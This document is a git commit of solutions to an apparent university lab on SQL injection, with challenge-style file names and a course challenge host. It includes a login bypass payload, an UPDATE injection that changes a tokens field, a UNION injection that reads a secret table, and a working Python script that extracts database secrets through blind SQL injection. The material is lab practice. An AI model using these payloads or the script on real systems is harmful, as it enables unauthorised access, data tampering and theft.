Lab5

2025-12-11 21:33:56 +00:00
parent f378edec75
commit 6ff3273351
4 changed files with 79 additions and 0 deletions
--- a/pa/lab5/chall_I_will_take_care_of_this_site.txt
+++ b/pa/lab5/chall_I_will_take_care_of_this_site.txt
@@ -0,0 +1,3 @@
 SELECT id, username, password, bio, age, jackpot_val FROM user WHERE username = '' AND password = '<pass>'
 admin' OR  username = '
--- a/pa/lab5/chall_money_money_money.txt
+++ b/pa/lab5/chall_money_money_money.txt
@@ -0,0 +1,3 @@
 UPDATE user SET bio = ''' WHERE username = 'didas'
 ', tokens = '65666
--- a/pa/lab5/chall_sometimes_we_are_just_temporarily_blind.py
+++ b/pa/lab5/chall_sometimes_we_are_just_temporarily_blind.py
@@ -0,0 +1,70 @@
 from requests import get
 from urllib.parse import quote
 import re
 BASE = "http://ssof2526.challenges.cwte.me:25262"
 PL_HEAD = "' AND id = 0 UNION "
 PL_TAIL = "--"
 def get_arts(payload: str) -> int:
 	final_payload = PL_HEAD + payload + PL_TAIL
 	resp = get(BASE+"/?search="+quote(final_payload))
 	content = resp.content.decode('utf-8')
 	result = re.search(r"Found ([0-9]+) article", content)
 	if result is None:
 		print("Payload malformed:")
 		print(payload)
 		print(content)
 		exit(1)
 	return int(result.group(1))
 def stringer(column: str, table: str, where: str = "1 = 1", max: int = 50) -> list[str]:
 	lengths = []
 	strings = []
 	for length in range(max):
 		length += 1
 		payload = "SELECT %s, %s, %s FROM %s WHERE LENGTH(%s) = %d AND %s;"%(column, column, column, table, column, length, where)
 		arts = get_arts(payload)
 		if arts != 0:
 			lengths.append(length)
 			print("Length %d has %s"%(length, arts))
 	for length in lengths:
 		print("Searching for len", length, " ", end="", flush=True)
 		name = ""
 		for _ in range(length):
 			print(".", end="", flush=True)
 			for l in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_()[]+-*/;:,. !\"&|{}~^`=":
 				cur_name = name + (l if l != '_' else "\\_")
 				payload = "SELECT %s, %s, %s FROM %s WHERE LENGTH(%s) = %d AND '%s' = substr((%s), %d, 1) AND %s;"%(column, column, column, table, column, length, l, column, len(cur_name)-1, where)
 				if (get_arts(payload) != 0):
 					name = cur_name
 					break
 			if name == cur_name[:-1]:
 				name = name + '_'
 		strings.append(name)
 		print(" found", name)
 	return strings
 #print(stringer("name", "sqlite_master"))
 #print(stringer("sql", "sqlite_master", "name == 'super_s_sof_secrets'", 100))
 print(stringer("secret", "super_s_sof_secrets", max=120))
 # SELECT id, title, content FROM blog_post WHERE title LIKE '<input>
 #' AND id = 0 UNION SELECT id, title, content FROM blog_post WHERE title LIKE 'flag'; --
--- a/pa/lab5/chall_wow_it_cant_be_more_juicy_than_this.txt
+++ b/pa/lab5/chall_wow_it_cant_be_more_juicy_than_this.txt
@@ -0,0 +1,3 @@
 SELECT id, title, content FROM blog_post WHERE title LIKE '%a'%' OR content LIKE '%a'%'
 ' UNION SELECT id, title, content FROM secret_blog_post ;--
		`@@ -0,0 +1,3 @@`
							`SELECT id, username, password, bio, age, jackpot_val FROM user WHERE username = '' AND password = '<pass>'`

							`admin' OR username = '`
		`@@ -0,0 +1,3 @@`
							`UPDATE user SET bio = ''' WHERE username = 'didas'`

							`', tokens = '65666`
		`@@ -0,0 +1,3 @@`
							`SELECT id, title, content FROM blog_post WHERE title LIKE '%a'%' OR content LIKE '%a'%'`

							`' UNION SELECT id, title, content FROM secret_blog_post ;--`